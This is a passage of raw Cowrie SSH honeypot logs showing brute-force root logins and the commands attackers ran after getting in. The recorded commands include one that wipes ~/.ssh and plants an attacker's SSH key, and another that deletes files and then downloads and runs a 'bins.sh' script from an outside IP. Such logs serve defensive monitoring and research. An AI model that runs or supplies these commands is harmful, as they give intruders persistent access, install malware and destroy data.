~","sensor":"my-vps","timestamp":"2025-08-26T01:56:48.505434Z","src_ip":"134.122.191.244","session":"b6895524d215"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T01:56:48.706528Z","src_ip":"134.122.191.244","session":"b6895524d215"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:56:48.707484Z","src_ip":"134.122.191.244","session":"b6895524d215"}
{"eventid":"cowrie.session.connect","src_ip":"134.122.191.244","src_port":45780,"dst_ip":"1.2.3.4","dst_port":22,"session":"1428cc0cb982","protocol":"ssh","message":"New connection: 134.122.191.244:45780 (1.2.3.4:22) [session: 1428cc0cb982]","sensor":"my-vps","timestamp":"2025-08-26T01:56:48.900287Z"}
{"eventid":"cowrie.login.success","username":"root","password":"asdfgh123456","message":"login attempt [root/asdfgh123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:56:48.965727Z","src_ip":"186.96.151.198","session":"1bb550fe1940"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:56:49.324251Z","src_ip":"186.96.151.198","session":"1bb550fe1940"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T01:56:49.324726Z","src_ip":"186.96.151.198","session":"1bb550fe1940"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T01:56:49.325760Z","src_ip":"186.96.151.198","session":"1bb550fe1940"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:56:49.479361Z","src_ip":"186.96.151.198","session":"1bb550fe1940"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:56:49.802087Z","src_ip":"186.96.151.198","session":"1bb550fe1940"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T01:56:49.802844Z","src_ip":"186.96.151.198","session":"1bb550fe1940"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43026,"dst_ip":"1.2.3.4","dst_port":22,"session":"0bbf609afe7c","protocol":"ssh","message":"New connection: 212.227.235.229:43026 (1.2.3.4:22) [session: 0bbf609afe7c]","sensor":"my-vps","timestamp":"2025-08-26T01:56:49.828519Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:56:49.829360Z","src_ip":"212.227.235.229","session":"0bbf609afe7c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T01:56:49.957479Z","src_ip":"186.96.151.198","session":"1bb550fe1940"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:56:49.958429Z","src_ip":"186.96.151.198","session":"1bb550fe1940"}
{"eventid":"cowrie.session.connect","src_ip":"186.96.151.198","src_port":59176,"dst_ip":"1.2.3.4","dst_port":22,"session":"8fb56460a6c2","protocol":"ssh","message":"New connection: 186.96.151.198:59176 (1.2.3.4:22) [session: 8fb56460a6c2]","sensor":"my-vps","timestamp":"2025-08-26T01:56:50.110365Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:56:50.112030Z","src_ip":"186.96.151.198","session":"8fb56460a6c2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:56:50.112663Z","src_ip":"212.227.235.229","session":"0bbf609afe7c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:56:50.265062Z","src_ip":"186.96.151.198","session":"8fb56460a6c2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:56:50.332974Z","src_ip":"87.120.191.13","session":"e41c338f3e82"}
{"eventid":"cowrie.command.input","input":"cd /tmp;rm -rf /tmp/* || cd /var/run || cd /mnt || cd /root;rm -rf /root/* || cd /; wget http://178.16.54.252/bins.sh; curl -O http://178.16.54.252/bins.sh;/bin/busybox wget http://178.16.54.252/bins.sh; chmod 777 bins.sh;./bins.sh;sh bins.sh; rm bins.sh","message":"CMD: cd /tmp;rm -rf /tmp/* || cd /var/run || cd /mnt || cd /root;rm -rf /root/* || cd /; wget http://178.16.54.252/bins.sh; curl -O http://178.16.54.252/bins.sh;/bin/busybox wget http://178.16.54.252/bins.sh; chmod 777 bins.sh;./bins.sh;sh bins.sh; rm bins.sh","sensor":"my-vps","timestamp":"2025-08-26T01:56:50.333694Z","src_ip":"87.120.191.13","session":"e41c338f3e82"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ad6355c5cb181585b8de0316e58f42672b652135ca9e19db3735bcacea5e3f16","size":139,"shasum":"ad6355c5cb181585b8de0316e58f42672b652135ca9e19db3735bcacea5e3f16","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/ad6355c5cb181585b8de0316e58f42672b652135ca9e19db3735bcacea5e3f16 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:56:50.356190Z","src_ip":"87.120.191.13","session":"e41c338f3e82"}
{"eventid":"cowrie.session.closed","duration":"202.3","message":"Connection lost after 202.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:56:50.376698Z","src_ip":"87.120.191.13","session":"e41c338f3e82"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T01:56:50.918744Z","src_ip":"186.96.151.198","session":"8fb56460a6c2"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":46948,"dst_ip":"1.2.3.4","dst_port":22,"session":"b87fee37e638","protocol":"ssh","message":"New connection: 87.120.191.13:46948 (1.2.3.4:22) [session: b87fee37e638]","sensor":"my-vps","timestamp":"2025-08-26T01:56:51.121763Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:56:51.122745Z","src_ip":"87.120.191.13","session":"b87fee37e638"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:56:51.147974Z","src_ip":"87.120.191.13","session":"b87fee37e638"}
{"eventid":"cowrie.login.success","username":"root","password":"student","message":"login attempt [root/student] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:56:51.211619Z","src_ip":"87.120.191.13","session":"b87fee37e638"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:56:51.326892Z","src_ip":"87.120.191.13","session":"b87fee37e638"}
{"eventid":"cowrie.command.input","input":"cd /tmp;rm -rf /tmp/* || cd /var/run || cd /mnt || cd /root;rm -rf /root/* || cd /; wget http://178.16.54.252/bins.sh; curl -O http://178.16.54.252/bins.sh;/bin/busybox wget http://178.16.54.252/bins.sh; chmod 777 bins.sh;./bins.sh;sh bins.sh; rm bins.sh","message":"CMD: cd /tmp;rm -rf /tmp/* || cd /var/run || cd /mnt || cd /root;rm -rf /root/* || cd /; wget http://178.16.54.252/bins.sh; curl -O http://178.16.54.252/bins.sh;/bin/busybox wget http://178.16.54.252/bins.sh; chmod 777 bins.sh;./bins.sh;sh bins.sh; rm bins.sh","sensor":"my-vps","timestamp":"2025-08-26T01:56:51.327556Z","src_ip":"87.120.191.13","session":"b87fee37e638"}
{"eventid":"cowrie.login.failed","username":"test","password":"123","message":"login attempt [test/123] failed","sensor":"my-vps","timestamp":"2025-08-26T01:56:51.331253Z","src_ip":"212.227.235.229","session":"0bbf609afe7c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ad6355c5cb181585b8de0316e58f42672b652135ca9e19db3735bcacea5e3f16","size":139,"shasum":"ad6355c5cb181585b8de0316e58f42672b652135ca9e19db3735bcacea5e3f16","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/ad6355c5cb181585b8de0316e58f42672b652135ca9e19db3735bcacea5e3f16 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:56:51.350343Z","src_ip":"87.120.191.13","session":"b87fee37e638"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:56:51.371733Z","src_ip":"87.120.191.13","session":"b1f4e4a98e1b"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-26T01:56:51.372398Z","src_ip":"87.120.191.13","session":"b1f4e4a98e1b"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:56:51.374055Z","src_ip":"87.120.191.13","session":"b87fee37e638"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:56:51.393193Z","src_ip":"87.120.191.13","session":"b1f4e4a98e1b"}
{"eventid":"cowrie.session.closed","duration":"203.1","message":"Connection lost after 203.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:56:51.394115Z","src_ip":"87.120.191.13","session":"b1f4e4a98e1b"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:56:52.073985Z","src_ip":"186.96.151.198","session":"8fb56460a6c2"}
{"eventid":"cowrie.session.connect","src_ip":"186.96.151.198","src_port":59710,"dst_ip":"1.2.3.4","dst_port":22,"session":"de177e2f7cbb","protocol":"ssh","message":"New connection: 186.96.151.198:59710 (1.2.3.4:22) [session: de177e2f7cbb]","sensor":"my-vps","timestamp":"2025-08-26T01:56:52.224469Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:56:52.225134Z","src_ip":"186.96.151.198","session":"de177e2f7cbb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:56:52.377625Z","src_ip":"186.96.151.198","session":"de177e2f7cbb"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:56:52.615264Z","src_ip":"212.227.235.229","session":"0bbf609afe7c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:56:53.027120Z","src_ip":"186.96.151.198","session":"de177e2f7cbb"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:56:53.180621Z","src_ip":"186.96.151.198","session":"de177e2f7cbb"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:56:53.181509Z","src_ip":"186.96.151.198","session":"1bb550fe1940"}
{"eventid":"cowrie.session.connect","src_ip":"134.122.191.244","src_port":52460,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e68f05b90c3","protocol":"ssh","message":"New connection: 134.122.191.244:52460 (1.2.3.4:22) [session: 4e68f05b90c3]","sensor":"my-vps","timestamp":"2025-08-26T01:56:56.939085Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:56:56.943813Z","src_ip":"134.122.191.244","session":"4e68f05b90c3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:56:57.143465Z","src_ip":"134.122.191.244","session":"4e68f05b90c3"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55718,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1c0c1c340be","protocol":"ssh","message":"New connection: 217.72.205.35:55718 (1.2.3.4:22) [session: e1c0c1c340be]","sensor":"my-vps","timestamp":"2025-08-26T01:56:57.618299Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:56:57.619397Z","src_ip":"217.72.205.35","session":"e1c0c1c340be"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:56:58.002703Z","src_ip":"134.122.191.244","session":"4e68f05b90c3"}
{"eventid":"cowrie.session.closed","duration":"13.6","message":"Connection lost after 13.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:56:58.213612Z","src_ip":"134.122.191.244","session":"b6895524d215"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:56:58.214651Z","src_ip":"134.122.191.244","session":"4e68f05b90c3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":22348,"dst_ip":"1.2.3.4","dst_port":22,"session":"e76dd1fb952f","protocol":"ssh","message":"New connection: 212.227.235.229:22348 (1.2.3.4:22) [session: e76dd1fb952f]","sensor":"my-vps","timestamp":"2025-08-26T01:57:48.479220Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:57:48.480298Z","src_ip":"212.227.235.229","session":"e76dd1fb952f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":22639,"dst_ip":"1.2.3.4","dst_port":22,"session":"71ae0bc017f2","protocol":"ssh","message":"New connection: 212.227.235.229:22639 (1.2.3.4:22) [session: 71ae0bc017f2]","sensor":"my-vps","timestamp":"2025-08-26T01:57:48.607337Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:57:48.608997Z","src_ip":"212.227.235.229","session":"71ae0bc017f2"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T01:57:48.738481Z","src_ip":"212.227.235.229","session":"71ae0bc017f2"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:57:49.129002Z","src_ip":"212.227.235.229","session":"71ae0bc017f2"}
